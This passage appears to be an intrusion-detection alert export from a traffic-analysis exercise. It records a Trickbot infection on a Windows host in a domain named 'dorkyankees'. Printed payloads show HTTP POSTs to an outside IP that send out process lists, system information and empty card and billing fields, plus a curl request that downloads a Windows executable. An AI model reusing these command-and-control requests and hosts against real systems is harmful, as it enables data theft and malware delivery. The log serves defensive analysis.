Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : localdomain
Description . . . . . . . . . . . : Intel(R) 82573E Gigabit Network Connection
Physical Address. . . . . . . . . : 00-08-02-1C-47-AE
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 172.16.1.101(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : Sunday, January 3, 2021 8:23:19 AM
Lease Expires . . . . . . . . . . : Sunday, January 10, 2021 8:23:19 AM
Default Gateway . . . . . . . . . : 172.16.1.1
DHCP Server . . . . . . . . . . . : 172.16.1.254
DNS Servers . . . . . . . . . . . : 172.16.1.16
Primary WINS Server . . . . . . . : 172.16.1.1
NetBIOS over Tcpip. . . . . . . . : Enabled
.net config workstation
Computer name \\DESKTOP-B5JPXN1
Full Computer name DESKTOP-B5JPXN1.dorkyankees.com
User name reggie.forsythe
Workstation active on
.NetBT_Tcpip_{909CE64D-AAC8-7A9F-DC15-E83F11DB6685} (0008021C47AE)
Software version Windows 10 Pro
Workstation domain DORKYANKEES
Workstation Dom |
---|
| 2021-01-04T09:09:47.235865-0800 | 172.16.1.101 | 103.14.232.46 | ET TROJAN Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration | * |
13 |
Timestamp | 2021-01-04T09:09:47.235865-0800 |
Flow Id | 1006814621206280 |
Source IP | 172.16.1.101 |
Source Port | 49153 |
Destination IP | 103.14.232.46 |
Destination Port | 443 |
Protocol | TCP |
Alert Signature | ET TROJAN Win32/Trickbot Data Exfiltration |
Alert Category | A Network Trojan was Detected |
Alert Severity | 1 |
Alert Gid | 1 |
Alert Signature Id | 2031241 |
Payload Printable | POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/90 HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=---WebKitFormBoundary7MA4YWxkTrZu0gW
User-Agent: Winhttp 1/0
Content-Length: 5876
Host: 103.14.232.46:443
-----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="proclist"
..----------------PROCESS LIST----------------
[System Process]
System
Registry
smss.exe
csrss.exe
wininit.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
svchost.exe
fontdrvhost.exe
fontdrvhost.exe
svchost.exe
svchost.exe
dwm.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
Memory Compression
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
spoolsv.exe
svchost.exe
armsvc.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
MsMpEng.exe
svchost.exe
svchost.exe
svchost.exe
SecurityHealthService.exe
dllhost.exe
sihost.exe
svchost.exe
svchost.exe
taskhostw.exe
svchost.exe
svchost.exe
ctfmon.exe
svchost.exe
explorer.exe
svchost.exe
StartMenuExperienceHost.exe
RuntimeBroker.exe
SearchApp.exe
RuntimeBroker.exe
svchost.exe
RuntimeBroker.exe
svchost.exe
TextInputHost.exe
dllhost.exe
SecurityHealthSystray.exe
ApplicationFrameHost.exe
svchost.exe
svchost.exe
RuntimeBroker.exe
svchost.exe
svchost.exe
svchost.exe
SgrmBroker.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
Microsoft.Photos.exe
svchost.exe
svchost.exe
OfficeClickToRun.exe
AppVShNotify.exe
AppVShNotify.exe
SearchIndexer.exe
RuntimeBroker.exe
svchost.exe
YourPhone.exe
svchost.exe
svchost.exe
svchost.exe
WUDFHost.exe
WinStore.App.exe
svchost.exe
svchost.exe
rundll32.exe
wermgr.exe
ShellExperienceHost.exe
RuntimeBroker.exe
svchost.exe
smartscreen.exe
svchost.exe
svchost.exe
audiodg.exe
SearchProtocolHost.exe
SearchFilterHost.exe
cmd.exe
conhost.exe
cmd.exe
conhost.exe
proclisttest
-----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="sysinfo"
..----------------SYSTEM_INFO----------------
.ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : DESKTOP-B5JPXN1
Primary Dns Suffix . . . . . . . : dorkyankees.com
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : dorkyankees.com
localdomain
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : localdomain
Description . . . . . . . . . . . : Intel(R) 82573E Gigabit Network Connection
Physical Address. . . . . . . . . : 00-08-02-1C-47-AE
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 172.16.1.101(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : Sunday, January 3, 2021 8:23:19 AM
Lease Expires . . . . . . . . . . : Sunday, January 10, 2021 8:23:19 AM
Default Gateway . . . . . . . . . : 172.16.1.1
DHCP Server . . . . . . . . . . . : 172.16.1.254
DNS Servers . . . . . . . . . . . : 172.16.1.16
Primary WINS Server . . . . . . . : 172.16.1.1
NetBIOS over Tcpip. . . . . . . . : Enabled
.net config workstation
Computer name \\DESKTOP-B5JPXN1
Full Computer name DESKTOP-B5JPXN1.dorkyankees.com
User name reggie.forsythe
Workstation active on
.NetBT_Tcpip_{909CE64D-AAC8-7A9F-DC15-E83F11DB6685} (0008021C47AE)
Software version Windows 10 Pro
Workstation domain DORKYANKEES
Workstation Dom |
---|
| 2021-01-04T09:09:47.235865-0800 | 172.16.1.101 | 103.14.232.46 | ET TROJAN Win32/Trickbot Data Exfiltration | * |
14 |
Timestamp | 2021-01-04T09:09:47.235865-0800 |
Flow Id | 1006814621206280 |
Source IP | 172.16.1.101 |
Source Port | 49153 |
Destination IP | 103.14.232.46 |
Destination Port | 443 |
Protocol | TCP |
Alert Signature | GPL ATTACK_RESPONSE command completed |
Alert Category | Potentially Bad Traffic |
Alert Severity | 2 |
Alert Gid | 1 |
Alert Signature Id | 2100494 |
Payload Printable | POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/90 HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=---WebKitFormBoundary7MA4YWxkTrZu0gW
User-Agent: Winhttp 1/0
Content-Length: 5876
Host: 103.14.232.46:443
-----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="proclist"
..----------------PROCESS LIST----------------
[System Process]
System
Registry
smss.exe
csrss.exe
wininit.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
svchost.exe
fontdrvhost.exe
fontdrvhost.exe
svchost.exe
svchost.exe
dwm.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
Memory Compression
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
spoolsv.exe
svchost.exe
armsvc.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
MsMpEng.exe
svchost.exe
svchost.exe
svchost.exe
SecurityHealthService.exe
dllhost.exe
sihost.exe
svchost.exe
svchost.exe
taskhostw.exe
svchost.exe
svchost.exe
ctfmon.exe
svchost.exe
explorer.exe
svchost.exe
StartMenuExperienceHost.exe
RuntimeBroker.exe
SearchApp.exe
RuntimeBroker.exe
svchost.exe
RuntimeBroker.exe
svchost.exe
TextInputHost.exe
dllhost.exe
SecurityHealthSystray.exe
ApplicationFrameHost.exe
svchost.exe
svchost.exe
RuntimeBroker.exe
svchost.exe
svchost.exe
svchost.exe
SgrmBroker.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
Microsoft.Photos.exe
svchost.exe
svchost.exe
OfficeClickToRun.exe
AppVShNotify.exe
AppVShNotify.exe
SearchIndexer.exe
RuntimeBroker.exe
svchost.exe
YourPhone.exe
svchost.exe
svchost.exe
svchost.exe
WUDFHost.exe
WinStore.App.exe
svchost.exe
svchost.exe
rundll32.exe
wermgr.exe
ShellExperienceHost.exe
RuntimeBroker.exe
svchost.exe
smartscreen.exe
svchost.exe
svchost.exe
audiodg.exe
SearchProtocolHost.exe
SearchFilterHost.exe
cmd.exe
conhost.exe
cmd.exe
conhost.exe
proclisttest
-----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="sysinfo"
..----------------SYSTEM_INFO----------------
.ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : DESKTOP-B5JPXN1
Primary Dns Suffix . . . . . . . : dorkyankees.com
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : dorkyankees.com
localdomain
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : localdomain
Description . . . . . . . . . . . : Intel(R) 82573E Gigabit Network Connection
Physical Address. . . . . . . . . : 00-08-02-1C-47-AE
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 172.16.1.101(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : Sunday, January 3, 2021 8:23:19 AM
Lease Expires . . . . . . . . . . : Sunday, January 10, 2021 8:23:19 AM
Default Gateway . . . . . . . . . : 172.16.1.1
DHCP Server . . . . . . . . . . . : 172.16.1.254
DNS Servers . . . . . . . . . . . : 172.16.1.16
Primary WINS Server . . . . . . . : 172.16.1.1
NetBIOS over Tcpip. . . . . . . . : Enabled
.net config workstation
Computer name \\DESKTOP-B5JPXN1
Full Computer name DESKTOP-B5JPXN1.dorkyankees.com
User name reggie.forsythe
Workstation active on
.NetBT_Tcpip_{909CE64D-AAC8-7A9F-DC15-E83F11DB6685} (0008021C47AE)
Software version Windows 10 Pro
Workstation domain DORKYANKEES
Workstation Dom |
---|
| 2021-01-04T09:09:47.235865-0800 | 172.16.1.101 | 103.14.232.46 | GPL ATTACK_RESPONSE command completed | * |
15 |
Timestamp | 2021-01-04T09:05:31.858162-0800 |
Flow Id | 1692306417285540 |
Source IP | 110.39.160.66 |
Source Port | 447 |
Destination IP | 172.16.1.101 |
Destination Port | 65507 |
Protocol | TCP |
Alert Signature | ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) |
Alert Category | Not Suspicious Traffic |
Alert Severity | 3 |
Alert Gid | 1 |
Alert Signature Id | 2011540 |
Payload Printable | ....A...=...o...v..r.?r....!t..'b...1H..x.{..0.................#.....................0...0..g.......F..~....2.6wNo.
i.f.0
..*.H..
.....0O1.0...U....US1.0...U....IL1.0...U....Chicago1!0...U.
..Internet Widgits Pty Ltd0..
201218153238Z.
211218153238Z0O1.0...U....US1.0...U....IL1.0...U....Chicago1!0...U.
..Internet Widgits Pty Ltd0.."0
..*.H..
..........0..
........z..[];4.\U...P.?.>..'.y
.6@mo.....9..N`.5....k....,]EW.l
.~..N.gY.'.3P../.XqT....7.~o]..............Jr.2..3.K..a....Y..3.@...C.%..l@.+/
@.......0t..T.tEZ%.E...=...O#..u..W1d..Bx..x..!U.v...^..|..R....J......Q...........:...#.."....C...e.&..+.....(5..7........S0Q0...U......Q.OY.t1(C.L;..AP....0...U.#..0...Q.OY.t1(C.L;..AP....0...U.......0....0
..*.H..
............P%.....e...5.[..$.K.m}d....T@...`..Q.gO..+A...D....<.N....H:j.\..?&.D...R..G.. @..e.:suo..VP.....[.Y
...#...h^...<....:<..
...$.JS...@.x...|.5b.S...Zf............UR..k-5;....O.9?..
=w....b..y.....O.D..$4..Q.<.a...=p9.....
.e.\........
.0+...:E..D.......M....,...(... .`
.T[D.'.T......"+....H...a1Yf`.....P.M.s.".=....>.Q...{qj |n..D..9.`..F........Z..Sb.....@V.j2...k...<...b..Q......%........F.B....29N..L(.$a..$....+..T...q._...%g......Q;.............j.Q.Plj..3H.!z* .)...^y.J.H.WZ.5?..w...8..N.m..;.O..GKf..A]..
......ah..p.....M...B.%..[...7A_uZ.+..o....p......... |
---|
| 2021-01-04T09:05:31.858162-0800 | 110.39.160.66 | 172.16.1.101 | ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) | * |
16 |
Timestamp | 2021-01-04T09:07:13.174684-0800 |
Flow Id | 1740526021529519 |
Source IP | 172.16.1.101 |
Source Port | 65520 |
Destination IP | 158.51.96.25 |
Destination Port | 80 |
Protocol | TCP |
Alert Signature | ET POLICY curl User-Agent Outbound |
Alert Category | Attempted Information Leak |
Alert Severity | 2 |
Alert Gid | 1 |
Alert Signature Id | 2013028 |
Payload Printable | GET /images/picture.png HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: 158.51.96.25
|
---|
| 2021-01-04T09:07:13.174684-0800 | 172.16.1.101 | 158.51.96.25 | ET POLICY curl User-Agent Outbound | * |
17 |
Timestamp | 2021-01-04T09:07:36.508460-0800 |
Flow Id | 697611327117248 |
Source IP | 172.16.1.101 |
Source Port | 65524 |
Destination IP | 103.14.232.46 |
Destination Port | 443 |
Protocol | TCP |
Alert Signature | ET POLICY HTTP traffic on port 443 (POST) |
Alert Category | Potentially Bad Traffic |
Alert Severity | 2 |
Alert Gid | 1 |
Alert Signature Id | 2013926 |
Payload Printable | POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/83/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------IIWMODUDRFUBKOWM
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)
Host: 103.14.232.46:443
Content-Length: 282
Connection: Close
Cache-Control: no-cache
|
---|
| 2021-01-04T09:07:36.508460-0800 | 172.16.1.101 | 103.14.232.46 | ET POLICY HTTP traffic on port 443 (POST) | * |
18 |
Timestamp | 2021-01-04T09:07:39.887350-0800 |
Flow Id | 697611327117248 |
Source IP | 172.16.1.101 |
Source Port | 65524 |
Destination IP | 103.14.232.46 |
Destination Port | 443 |
Protocol | TCP |
Alert Signature | ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 |
Alert Category | Potentially Bad Traffic |
Alert Severity | 2 |
Alert Gid | 1 |
Alert Signature Id | 2018358 |
Payload Printable | POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/83/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------IIWMODUDRFUBKOWM
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)
Host: 103.14.232.46:443
Content-Length: 282
Connection: Close
Cache-Control: no-cache
-----------IIWMODUDRFUBKOWM
Content-Disposition: form-data; name="formdata"
{]}-----------IIWMODUDRFUBKOWM
Content-Disposition: form-data; name="billinfo"
{]}-----------IIWMODUDRFUBKOWM
Content-Disposition: form-data; name="cardinfo"
{]}
-----------IIWMODUDRFUBKOWM--
|
---|
| 2021-01-04T09:07:39.887350-0800 | 172.16.1.101 | 103.14.232.46 | ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 | * |
19 |
Timestamp | 2021-01-04T09:08:30.320763-0800 |
Flow Id | 1740526021529519 |
Source IP | 158.51.96.25 |
Source Port | 80 |
Destination IP | 172.16.1.101 |
Destination Port | 65520 |
Protocol | TCP |
Alert Signature | ET POLICY PE EXE or DLL Windows file download HTTP |
Alert Category | Potential Corporate Privacy Violation |
Alert Severity | 1 |
Alert Gid | 1 |
Alert Signature Id | 2018959 |
Payload Printable | HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Mon, 04 Jan 2021 17:07:12 GMT
Content-Type: Content-type: application/octet-stream
Content-Length: 684117
Connection: keep-alive
MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
$........<.!.].r.].r.].r.B.r.].r.].r.].r.B.r.].r.6.s.].r.].r-\.raA.r.].r
B.rh].r
B.r.].rZ[.r.].rRich.].r........PE..L....%._..........................................@...........................
......................................................@.......................P
..O...................................................................................text...-........................... ..`.rdata..............................@..@.data....o.......0..................@....idata...0.......@..................@....rsrc........@......................@..@.reloc...U...P
..`....
.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... |
---|
| 2021-01-04T09:08:30.320763-0800 | 158.51.96.25 | 172.16.1.101 | ET POLICY PE EXE or DLL Windows file download HTTP | * |
20 |
Timestamp | 2021-01-04T09:08:30.320763-0800 |
Flow Id | 1740526021529519 |
Source IP | 158.51.96.25 |
Source Port | 80 |
Destination IP | 172.16.1.101 |
Destination Port | 65520 |
Protocol | TCP |
Alert Signature | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
Alert Category | Potentially Bad Traffic |
Alert Severity | 2 |
Alert Gid | 1 |
Alert Signature Id | 2021076 |
Payload Printable | HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Mon, 04 Jan 2021 17:07:12 GMT
Content-Type: Content-type: application/octet-stream
Content-Length: 684117
Connection: keep-alive
MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
$........<.!.].r.].r.].r.B.r.].r.].r.].r.B.r.].r.6.s.].r.].r-\.raA.r.].r
B.rh].r
B.r.].rZ[.r.].rRich.].r........PE..L....%._..........................................@...........................
......................................................@.......................P
..O...................................................................................text...-........................... ..`.rdata..............................@..@.data....o.......0..................@....idata...0.......@..................@....rsrc........@......................@..@.reloc...U...P
..`....
.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... |
---|
| 2021-01-04T09:08:30.320763-0800 | 158.51.96.25 | 172.16.1.101 | ET INFO SUSPICIOUS Dotted Quad Host MZ Response | * |